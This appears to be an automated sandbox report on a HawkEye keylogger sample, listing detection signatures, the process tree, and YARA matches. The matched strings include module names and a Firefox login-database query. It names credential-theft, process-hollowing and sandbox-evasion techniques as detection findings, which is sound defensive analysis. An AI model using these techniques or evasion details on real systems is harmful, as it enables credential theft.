Play interactive tour

Edit tour

Analysis Report b15023b1855da1cf5213b061dc626cc2

Overview

General Information

Sample Name:	b15023b1855da1cf5213b061dc626cc2 (renamed file extension from none to exe)
Analysis ID:	320480
MD5:	ac5eb6172c287cbb954954b56586653f
SHA1:	3bb19910b89a39274957959dec593964bcf12ee4
SHA256:	da23b9268823cc4bcc82fdc74b6bd9c5d8493347507f111de7c387cbe215b264
Tags:	HawkEye
Most interesting Screenshot:

Detection

HawkEye MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected HawkEye Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected HawkEye Keylogger

Yara detected MailPassView

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

b15023b1855da1cf5213b061dc626cc2.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe' MD5: AC5EB6172C287CBB954954B56586653F)

RegAsm.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\b15023b1855da1cf5213b061dc626cc2.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

vbc.exe (PID: 6576 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp992B.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 6280 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp92CE.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)

xjyxibeifbdmock.exe (PID: 6828 cmdline: 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe' MD5: C0962CFBB4BB43348708437D8CD1D8EF)

RegAsm.exe (PID: 6852 cmdline: 'C:\Users\user\AppData\Roaming\ezocxcvggg\xjyxibeifbdmock.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

vbc.exe (PID: 6948 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpDC10.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 3252 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD611.tmp' MD5: C63ED21D5706A527419C9FBD730FFB2E)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.608241206.00000000035AF000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.606139905.0000000002DD2000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
00000005.00000002.608017137.0000000002F0D000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x6b4fa:$a1: logins.json 0x6b45a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x6bc7e:$s4: \mozsqlite3.dll 0x6a4ee:$s5: SMTP Password
00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000003.397841054.0000000004583000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x8f478:$s1: HawkEye Keylogger 0x8e558:$s2: _ScreenshotLogger 0x8eab4:$s2: _ScreenshotLogger 0x8e525:$s3: _PasswordStealer 0x8ea81:$s3: _PasswordStealer
00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x8f478:$s1: HawkEye Keylogger 0x8e558:$s2: _ScreenshotLogger 0x8eab4:$s2: _ScreenshotLogger 0x8e525:$s3: _PasswordStealer 0x8ea81:$s3: _PasswordStealer
00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.609144823.00000000068B1000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x6b4fa:$a1: logins.json 0x6b45a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x6bc7e:$s4: \mozsqlite3.dll 0x6a4ee:$s5: SMTP Password
00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000001.00000002.609395469.0000000006F61000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000002.606262904.0000000003472000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87a2e:$s1: HawkEye Keylogger 0x87a97:$s1: HawkEye Keylogger 0x80e71:$s2: _ScreenshotLogger 0x80e3e:$s3: _PasswordStealer
00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000001.00000003.361093839.0000000004C23000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87a2e:$s1: HawkEye Keylogger 0x87a97:$s1: HawkEye Keylogger 0x80e71:$s2: _ScreenshotLogger 0x80e3e:$s3: _PasswordStealer
00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: vbc.exe PID: 6576	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 3252	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: vbc.exe PID: 6280	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: vbc.exe PID: 6948	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: RegAsm.exe PID: 6852	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0xda174:$s2: _ScreenshotLogger 0xda7e9:$s2: _ScreenshotLogger 0xdb0b3:$s2: _ScreenshotLogger 0xdbe1f:$s2: _ScreenshotLogger 0x147ad1:$s2: _ScreenshotLogger 0xda11d:$s3: _PasswordStealer 0xda792:$s3: _PasswordStealer 0xdb05c:$s3: _PasswordStealer 0xdbdc8:$s3: _PasswordStealer 0x147a7a:$s3: _PasswordStealer
Process Memory Space: RegAsm.exe PID: 6852	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: RegAsm.exe PID: 6852	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: RegAsm.exe PID: 6852	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: RegAsm.exe PID: 6476	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x56f5f:$s2: _ScreenshotLogger 0x575d4:$s2: _ScreenshotLogger 0x57eb0:$s2: _ScreenshotLogger 0x58c66:$s2: _ScreenshotLogger 0x13fb51:$s2: _ScreenshotLogger 0x56f08:$s3: _PasswordStealer 0x5757d:$s3: _PasswordStealer 0x57e59:$s3: _PasswordStealer 0x58c0f:$s3: _PasswordStealer 0x13fafa:$s3: _PasswordStealer
Process Memory Space: RegAsm.exe PID: 6476	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: RegAsm.exe PID: 6476	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: RegAsm.exe PID: 6476	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: xjyxibeifbdmock.exe PID: 6828	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x18c9bc:$s2: _ScreenshotLogger 0x18c965:$s3: _PasswordStealer
Process Memory Space: xjyxibeifbdmock.exe PID: 6828	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x14d42d:$s2: _ScreenshotLogger 0x14d3d6:$s3: _PasswordStealer
Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Click to see the 49 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x85e2e:$s1: HawkEye Keylogger 0x85e97:$s1: HawkEye Keylogger 0x7f271:$s2: _ScreenshotLogger 0x7f23e:$s3: _PasswordStealer
4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x85e2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x85e97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x7f23e:$str1: _PasswordStealer 0x7f24f:$str2: _KeyStrokeLogger 0x7f271:$str3: _ScreenshotLogger 0x7f260:$str4: _ClipboardLogger 0x7f283:$str5: _WebCamLogger 0x7f398:$str6: _AntiVirusKiller 0x7f386:$str7: _ProcessElevation 0x7f34d:$str8: _DisableCommandPrompt 0x7f453:$str9: _WebsiteBlocker 0x7f463:$str9: _WebsiteBlocker 0x7f339:$str10: _DisableTaskManager 0x7f3b4:$str11: _AntiDebugger 0x7f43e:$str12: _WebsiteVisitorSites 0x7f363:$str13: _DisableRegEdit 0x7f3c2:$str14: _ExecutionDelay 0x7f2e7:$str15: _InstallStartupPersistance
5.2.RegAsm.exe.4d10000.1.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x6b4fa:$a1: logins.json 0x6b45a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x6bc7e:$s4: \mozsqlite3.dll 0x6a4ee:$s5: SMTP Password
5.2.RegAsm.exe.4d10000.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.RegAsm.exe.4d10000.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
13.2.vbc.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
13.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
13.2.vbc.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
13.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
19.2.vbc.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
19.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.RegAsm.exe.4d10000.1.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x696fa:$a1: logins.json 0x6965a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x69e7e:$s4: \mozsqlite3.dll 0x686ee:$s5: SMTP Password
5.2.RegAsm.exe.4d10000.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.RegAsm.exe.4d10000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.2.RegAsm.exe.53b0000.1.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x696fa:$a1: logins.json 0x6965a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x69e7e:$s4: \mozsqlite3.dll 0x686ee:$s5: SMTP Password
1.2.RegAsm.exe.53b0000.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
1.2.RegAsm.exe.53b0000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
2.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x85e2e:$s1: HawkEye Keylogger 0x85e97:$s1: HawkEye Keylogger 0x7f271:$s2: _ScreenshotLogger 0x7f23e:$s3: _PasswordStealer
0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x85e2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x85e97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x7f23e:$str1: _PasswordStealer 0x7f24f:$str2: _KeyStrokeLogger 0x7f271:$str3: _ScreenshotLogger 0x7f260:$str4: _ClipboardLogger 0x7f283:$str5: _WebCamLogger 0x7f398:$str6: _AntiVirusKiller 0x7f386:$str7: _ProcessElevation 0x7f34d:$str8: _DisableCommandPrompt 0x7f453:$str9: _WebsiteBlocker 0x7f463:$str9: _WebsiteBlocker 0x7f339:$str10: _DisableTaskManager 0x7f3b4:$str11: _AntiDebugger 0x7f43e:$str12: _WebsiteVisitorSites 0x7f363:$str13: _DisableRegEdit 0x7f3c2:$str14: _ExecutionDelay 0x7f2e7:$str15: _InstallStartupPersistance
1.2.RegAsm.exe.400000.0.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
1.2.RegAsm.exe.400000.0.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
2.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
6.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
5.2.RegAsm.exe.400000.0.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
5.2.RegAsm.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.RegAsm.exe.400000.0.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x87c2e:$id1: HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \ {2} 0x87c97:$id2: HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \ {3}{0}{0}{4} 0x8103e:$str1: _PasswordStealer 0x8104f:$str2: _KeyStrokeLogger 0x81071:$str3: _ScreenshotLogger 0x81060:$str4: _ClipboardLogger 0x81083:$str5: _WebCamLogger 0x81198:$str6: _AntiVirusKiller 0x81186:$str7: _ProcessElevation 0x8114d:$str8: _DisableCommandPrompt 0x81253:$str9: _WebsiteBlocker 0x81263:$str9: _WebsiteBlocker 0x81139:$str10: _DisableTaskManager 0x811b4:$str11: _AntiDebugger 0x8123e:$str12: _WebsiteVisitorSites 0x81163:$str13: _DisableRegEdit 0x811c2:$str14: _ExecutionDelay 0x810e7:$str15: _InstallStartupPersistance
19.2.vbc.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
19.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
1.2.RegAsm.exe.53b0000.1.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x6b4fa:$a1: logins.json 0x6b45a:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x6bc7e:$s4: \mozsqlite3.dll 0x6a4ee:$s5: SMTP Password
1.2.RegAsm.exe.53b0000.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
1.2.RegAsm.exe.53b0000.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x87c2e:$s1: HawkEye Keylogger 0x87c97:$s1: HawkEye Keylogger 0x81071:$s2: _ScreenshotLogger 0x8103e:$s3: _PasswordStealer
0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
